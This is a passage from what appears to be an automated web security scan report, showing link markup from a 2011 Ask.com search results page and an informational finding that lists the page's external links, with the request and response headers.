ss('http://www.google.com/aclk?sa=l&ai=CghMyyMNBTbWbBMXQggfI5Lz6DtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUIzAuNf8_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9Cia5Wx6AzZ6kRlXE50BOXpwLg1d0oUoab39A&num=5&ctype=4&sig=AGiWqtxIqo9W0EOPstvvwcu4lgiV-9_nJA&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture')" onmouseout="cs()" style="">Shop Pontoon Furniture</a>
...[SNIP]...
<td>

<a id="r1_t" href="http://www.regulatormarine.com/32fs.html"
onmousedown="return fp(this,{en:'in',io:'0',b:'a002',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r2_t" href="http://www.reel-time.com/forum/showthread.php?t=41911"
onmousedown="return fp(this,{en:'te',io:'0',b:'a003',tp:'d',ec:'1',ex:'tsrc%3Dvnru'},'false',0)" class="title txt_lg" target="_blank" >99 <b>
...[SNIP]...
<td>

<a id="r3_t" href="http://www.comstockyachtsales.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a004',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" >New Jersey <b>
...[SNIP]...
<td>

<a id="r4_t" href="http://www.comstockyachtsales.com/aboutus.asp"
onmousedown="return fp(this,{en:'in',io:'0',b:'a005',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" >New Jersey <b>
...[SNIP]...
<td>

<a id="r5_t" href="http://grillautomotivebestbuy.co.cc/info-Camco_40053_RV_Brass_Water_Pressure_Regulator-B000BQ7WH2.html"
onmousedown="return fp(this,{en:'te',io:'0',b:'a006',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" >Camco 40053 RV Brass Water Pressure <b>
...[SNIP]...
<td>

<a id="r6_t" href="http://www.fishingandboats.com/boat-regulator.html"
onmousedown="return fp(this,{en:'te',io:'0',b:'a007',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" >Install a <b>
...[SNIP]...
<td>

<a id="r7_t" href="http://www.boatworldusa.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a008',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r8_t" href="http://www.yachtworld.com/boats/category/type/Regulator"
onmousedown="return fp(this,{en:'te',io:'0',b:'a009',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r9_t" href="http://www.regulatormarinegear.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a010',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=C-3uWyMNBTbWbBMXQggfI5Lz6Dvrhr8IB-LvxmQWM05gsEAEg-_6BAygFULbt844HYMmGo4fUo4AQyAEBqgQcT9CiUL2x7AzZ6kRAYUhhBOXpwLg1d0oUoab39A&num=1&sig=AGiWqtyDArmYr7MoWPcckN6wmR1i2zj75w&adurl=http://www.gootees.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(53); if (typeof efclk != 'undefined') efclk(53); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D14a8Lu-z94%26sgch%3D95f9DK1QV'},'gg_0');" class="nu" onmouseover="return ss('www.gootees.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_0" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=C-3uWyMNBTbWbBMXQggfI5Lz6Dvrhr8IB-LvxmQWM05gsEAEg-_6BAygFULbt844HYMmGo4fUo4AQyAEBqgQcT9CiUL2x7AzZ6kRAYUhhBOXpwLg1d0oUoab39A&num=1&sig=AGiWqtyDArmYr7MoWPcckN6wmR1i2zj75w&adurl=http://www.gootees.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(53); if (typeof efclk != 'undefined') efclk(53); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D14a8Lu-z94%26sgch%3D95f9DK1QV'},'gg_0');" class="nu" onmouseover="return ss('www.gootees.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=ChnilyMNBTbWbBMXQggfI5Lz6DpyQkeEBpIyLrBTc66IsEAIg-_6BAygFUKuO7fEFYMmGo4fUo4AQoAGA6M38A8gBAaoEGU_Q4iKase8M2aJE-zPdFQPp9xoIMR8Vbd0&num=2&sig=AGiWqtyIsbu6EciQStUSPIX6WHKtzp8t1g&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(6); if (typeof efclk != 'undefined') efclk(6); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D14a8Lu-z94%26sgch%3D95f9DK1QV'},'gg_1');" class="nu" onmouseover="return ss('www.wholesalemarine.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_1" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=ChnilyMNBTbWbBMXQggfI5Lz6DpyQkeEBpIyLrBTc66IsEAIg-_6BAygFUKuO7fEFYMmGo4fUo4AQoAGA6M38A8gBAaoEGU_Q4iKase8M2aJE-zPdFQPp9xoIMR8Vbd0&num=2&sig=AGiWqtyIsbu6EciQStUSPIX6WHKtzp8t1g&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(6); if (typeof efclk != 'undefined') efclk(6); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D14a8Lu-z94%26sgch%3D95f9DK1QV'},'gg_1');" class="nu" onmouseover="return ss('www.wholesalemarine.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=C6MojyMNBTbWbBMXQggfI5Lz6Dqn3pJ4B5ZrwpxLfgdAFEAMg-_6BAygFUNvdkej7_____wFgyYajh9SjgBDIAQGqBBZP0OJErLHuDNn7RZo00QvZWfNyV0hj&num=3&sig=AGiWqtzQRlN0C4TyZRs7AydQonjyEpvIHA&adurl=http://www.gatewaymarina.com/ship_store.html" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(41); if (typeof efclk != 'undefined') efclk(41); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D14a8Lu-z94%26sgch%3D95f9DK1QV'},'gg_2');" class="nu" onmouseover="return ss('www.gatewaymarina.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_2" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=C6MojyMNBTbWbBMXQggfI5Lz6Dqn3pJ4B5ZrwpxLfgdAFEAMg-_6BAygFUNvdkej7_____wFgyYajh9SjgBDIAQGqBBZP0OJErLHuDNn7RZo00QvZWfNyV0hj&num=3&sig=AGiWqtzQRlN0C4TyZRs7AydQonjyEpvIHA&adurl=http://www.gatewaymarina.com/ship_store.html" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(41); if (typeof efclk != 'undefined') efclk(41); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D14a8Lu-z94%26sgch%3D95f9DK1QV'},'gg_2');" class="nu" onmouseover="return ss('www.gatewaymarina.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=C3pr7yMNBTbWbBMXQggfI5Lz6DsmNwHPR0I-RDdbRiAcQBCD7_oEDKAVQlbmT_wZgyYajh9SjgBDIAQGpAnKI1I7Exro-qgQbT9DyHc2x6QTZGkd66N-s3oZXEclPzI8CLUXk&num=4&sig=AGiWqtx0ihnwiY--aE9T3UynJ_M_RH6kDg&adurl=http://www.pharmalinkconsulting.co.uk" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(19); if (typeof efclk != 'undefined') efclk(19); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D14a8Lu-z94%26sgch%3D95f9DK1QV'},'gg_3');" class="nu" onmouseover="return ss('www.pharmalinkconsulting.co.uk')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_3" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=C3pr7yMNBTbWbBMXQggfI5Lz6DsmNwHPR0I-RDdbRiAcQBCD7_oEDKAVQlbmT_wZgyYajh9SjgBDIAQGpAnKI1I7Exro-qgQbT9DyHc2x6QTZGkd66N-s3oZXEclPzI8CLUXk&num=4&sig=AGiWqtx0ihnwiY--aE9T3UynJ_M_RH6kDg&adurl=http://www.pharmalinkconsulting.co.uk" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(19); if (typeof efclk != 'undefined') efclk(19); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D14a8Lu-z94%26sgch%3D95f9DK1QV'},'gg_3');" class="nu" onmouseover="return ss('www.pharmalinkconsulting.co.uk')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CBUHhyMNBTbWbBMXQggfI5Lz6DtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUPeXq-oFYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QomuVsegM2epEZVxOdATl6cC4NXdKFKGm9_Q&num=5&sig=AGiWqtxpLZ2vM7f5XLXz2QrraD-llheIsg&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boat_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(14); if (typeof efclk != 'undefined') efclk(14); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D14a8Lu-z94%26sgch%3D95f9DK1QV'},'gg_4');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_4" st_id='1'>
...[SNIP]...
<br/>
<a href="http://www.google.com/aclk?sa=l&ai=CBUHhyMNBTbWbBMXQggfI5Lz6DtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUPeXq-oFYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QomuVsegM2epEZVxOdATl6cC4NXdKFKGm9_Q&num=5&sig=AGiWqtxpLZ2vM7f5XLXz2QrraD-llheIsg&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boat_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(14); if (typeof efclk != 'undefined') efclk(14); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D14a8Lu-z94%26sgch%3D95f9DK1QV'},'gg_4');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CSN7FyMNBTbWbBMXQggfI5Lz6DtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUN64i676_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9Cia5Wx6AzZ6kRlXE50BOXpwLg1d0oUoab39A&num=5&ctype=4&sig=AGiWqtxfaQ8a2FqsV8kHIW9RCCMQJdtwJQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(14); if (typeof efclk != 'undefined') efclk(14); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D14a8Lu-z94%26sgch%3D95f9DK1QV'},'gg_4');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CSN7FyMNBTbWbBMXQggfI5Lz6DtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUN64i676_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9Cia5Wx6AzZ6kRlXE50BOXpwLg1d0oUoab39A&num=5&ctype=4&sig=AGiWqtxfaQ8a2FqsV8kHIW9RCCMQJdtwJQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing')" onmouseout="cs()" style="">Winterizing</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=C2u0JyMNBTbWbBMXQggfI5Lz6DtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUNCLsoUCYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QomuVsegM2epEZVxOdATl6cC4NXdKFKGm9_Q&num=5&ctype=4&sig=AGiWqtyqnyV9YACdmIUd3I1uHBwi1TaOYQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(14); if (typeof efclk != 'undefined') efclk(14); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D14a8Lu-z94%26sgch%3D95f9DK1QV'},'gg_4');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=C2u0JyMNBTbWbBMXQggfI5Lz6DtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUNCLsoUCYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QomuVsegM2epEZVxOdATl6cC4NXdKFKGm9_Q&num=5&ctype=4&sig=AGiWqtyqnyV9YACdmIUd3I1uHBwi1TaOYQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats')" onmouseout="cs()" style="">Shop Boat Seats</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CyNziyMNBTbWbBMXQggfI5Lz6DtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUP_fwIgEYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QomuVsegM2epEZVxOdATl6cC4NXdKFKGm9_Q&num=5&ctype=4&sig=AGiWqty3WLVZV9osAWmuBhbedOlDB86V7g&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(14); if (typeof efclk != 'undefined') efclk(14); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D14a8Lu-z94%26sgch%3D95f9DK1QV'},'gg_4');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CyNziyMNBTbWbBMXQggfI5Lz6DtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUP_fwIgEYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QomuVsegM2epEZVxOdATl6cC4NXdKFKGm9_Q&num=5&ctype=4&sig=AGiWqty3WLVZV9osAWmuBhbedOlDB86V7g&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool')" onmouseout="cs()" style="">Boat Cover Selection Tool</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CghMyyMNBTbWbBMXQggfI5Lz6DtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUIzAuNf8_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9Cia5Wx6AzZ6kRlXE50BOXpwLg1d0oUoab39A&num=5&ctype=4&sig=AGiWqtxIqo9W0EOPstvvwcu4lgiV-9_nJA&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(14); if (typeof efclk != 'undefined') efclk(14); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D14a8Lu-z94%26sgch%3D95f9DK1QV'},'gg_4');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CghMyyMNBTbWbBMXQggfI5Lz6DtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUIzAuNf8_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9Cia5Wx6AzZ6kRlXE50BOXpwLg1d0oUoab39A&num=5&ctype=4&sig=AGiWqtxIqo9W0EOPstvvwcu4lgiV-9_nJA&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture')" onmouseout="cs()" style="">Shop Pontoon Furniture</a>
...[SNIP]...

<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...

<a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=;u3=;u2=0;ord=-1022888328?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</script>

<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...

12.35. http://www.ask.com/web previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/web

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/web?q=regulator+boat&o=0&l=dir&page=1

The response contains the following links to other domains:

http://4.afs.googleadservices.com/images/partners/CLz2oe2S26YCFcJB5godVnd72g/aj-cat.png
http://api.recaptcha.net/js/recaptcha_ajax.js
http://ask.pronto.com/user/search.do?&q=regulator+boat
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://fls.doubleclick.net/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=;u3=;u2=0;ord=-1009913201?
http://grillautomotivebestbuy.co.cc/info-Camco_40053_RV_Brass_Water_Pressure_Regulator-B000BQ7WH2.html
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://www.askkids.com/?o=0&l=dir
http://www.boatworldusa.com/
http://www.comstockyachtsales.com/
http://www.comstockyachtsales.com/aboutus.asp
http://www.fishingandboats.com/boat-regulator.html
http://www.google.com/aclk?sa=L&ai=CKhLRH8tBTfzqGsKDmQfW7u3TDfzbru0BzO7z-h7ErfQEEAEg-_6BAygFUOC07eYEYMmGo4fUo4AQyAEBqgQYT9AexHv24pN5jhAmk3wLQW8DM3PoSymT&num=1&sig=AGiWqtx4UAGMana8plVwlqHmVxJ-4wwyKQ&adurl=http://www.bmgevents.com/frederickburg/boatshow/index.html
http://www.google.com/aclk?sa=L&ai=CV5vCH8tBTfzqGsKDmQfW7u3TDabv3JYB7K7Zpgumw8QWEAIg-_6BAygFULHa3fEDYMmGo4fUo4AQyAEBqgQbT9BujFr24ZN5jhB_kh0MTXHZg3eAFFDv9T4Y&num=2&sig=AGiWqtzc0quvAuXxD6Koezv_rlULhohqOA&adurl=http://www.abellmarine.com
http://www.google.com/aclk?sa=l&ai=C3LksH8tBTfzqGsKDmQfW7u3TDdvO8tsBk7izyxfr17kIEAMg-_6BAygFUJyA1YgHYMmGo4fUo4AQoAG50r__A8gBAaoEHE_Qbpd09uCbeX4TYCaM1JcSZ1IG-q-V-XndCzQ&num=3&ctype=4&sig=AGiWqtwzb4aK-dGZKZV3LjtQ71FvL9uvug&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture
http://www.google.com/aclk?sa=l&ai=C56M8H8tBTfzqGsKDmQfW7u3TDdvO8tsBk7izyxfr17kIEAMg-_6BAygFUOGQ56n-_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9Bul3T24Jt5fhNgJozUlxJnUgb6r5X5ed0LNA&num=3&ctype=4&sig=AGiWqtxTN1LS99I2GGVfhc_lzKHTPDdkUQ&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats
http://www.google.com/aclk?sa=l&ai=CXigbH8tBTfzqGsKDmQfW7u3TDe2R_78Br7bGshWQqMEHEAQg-_6BAygFUIX6pcj8_____wFgyYajh9SjgBCgAafk0foDyAEBqQK98dWE5OCwPqoEH0_QLoNL9uebeTYT_lgeer_NG1UK5HUl_RGCckh6awk&num=4&sig=AGiWqtxON8u7C2kzjCZXIJbedQwbVnqh-Q&adurl=http://www.BoaterExam.com/usa/DistrictOfColumbia/
http://www.google.com/aclk?sa=l&ai=CesXaH8tBTfzqGsKDmQfW7u3TDZyQkeEBpIyLrBTc66IsEAUg-_6BAygFUKuO7fEFYMmGo4fUo4AQoAGA6M38A8gBAaoEGU_QbqZ_9uabeTYT_kkftZAeeYi2_sfKgAU&num=5&sig=AGiWqty0dsNXKLOSQkvjirro2M71JAN9wQ&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404
http://www.google.com/aclk?sa=l&ai=ClIVJH8tBTfzqGsKDmQfW7u3TDdvO8tsBk7izyxfr17kIEAMg-_6BAygFUIfc5pcHYMmGo4fUo4AQoAG50r__A8gBAaoEHE_Qbpd09uCbeX4TYCaM1JcSZ1IG-q-V-XndCzQ&num=3&sig=AGiWqtxH5FI73CQ03a53xbqXPWHPoTI68Q&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boating_parts
http://www.google.com/aclk?sa=l&ai=ClUl0H8tBTfzqGsKDmQfW7u3TDdvO8tsBk7izyxfr17kIEAMg-_6BAygFUM_1s-kEYMmGo4fUo4AQoAG50r__A8gBAaoEHE_Qbpd09uCbeX4TYCaM1JcSZ1IG-q-V-XndCzQ&num=3&ctype=4&sig=AGiWqtx_zC8X_8DVFJtSMxNwTUOc4JBGhA&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing
http://www.google.com/aclk?sa=l&ai=CnX3zH8tBTfzqGsKDmQfW7u3TDdvO8tsBk7izyxfr17kIEAMg-_6BAygFUNHtnYX5_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9Bul3T24Jt5fhNgJozUlxJnUgb6r5X5ed0LNA&num=3&ctype=4&sig=AGiWqtyOt-AhQ1O4F9WUWeFTZ2xTbTxYzQ&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool
http://www.reel-time.com/forum/showthread.php?t=41911
http://www.regulatormarine.com/
http://www.regulatormarine.com/32fs.html
http://www.regulatormarinegear.com/
http://www.yachtworld.com/boats/category/type/Regulator

Request

GET /web?q=regulator+boat&o=0&l=dir&page=1 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:44:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:44:31 GMT; Path=/
Set-Cookie: clc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:44:31 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:44:31 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.|cmVndWxhdG9yK2JvYXQ.; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
